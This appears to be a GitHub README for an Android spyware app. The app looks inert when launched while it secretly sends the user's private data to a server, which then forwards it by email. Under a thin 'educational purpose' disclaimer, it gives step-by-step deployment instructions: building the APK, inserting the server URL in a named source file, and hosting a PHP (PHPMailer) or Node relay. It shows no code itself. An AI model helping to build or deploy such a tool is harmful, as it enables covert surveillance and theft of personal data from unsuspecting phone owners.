
This app does nothing when launched.. It secretely sends private data of the user to a server and then from server to email... Only for educational purpose.. Email is sent using PHPMailer.. https://github.com/PHPMailer/PHPMailer.

Primary LanguageJava


This app does nothing when launched.. It secretely sends private data of the user to a server and then from server to email... Only for educational purpose.. Email is sent using PHPMailer.. https://github.com/PHPMailer/PHPMailer.


The client (android app) does not require any setup. Just make the apk using Android Studio and add the server url in client/app/src/main/java/com/ankit/serverconnect/ConnectionService.java in line 77.
The server is written on two platforms (PHP and Node) you can use either of them.


For setting PHP server you need PHP Mailer:

  1. Make the folder server/PHP/phpmailer.
  2. Download class.phpmailer.php, class.pop3.php, class.smtp.php and PHPMailerAutoload.php from PHPMailer (https://github.com/PHPMailer/PHPMailer) and store it in phpmailer folder.
  3. Enter the sender and reciever emails and sender password and other details in email.php.
  4. It's all setup now host the php files and done.


For setting Node server:

  1. run npm update.
  2. If all dependencies in package.json are not installed, install them.
  3. ll done! Now just host the files.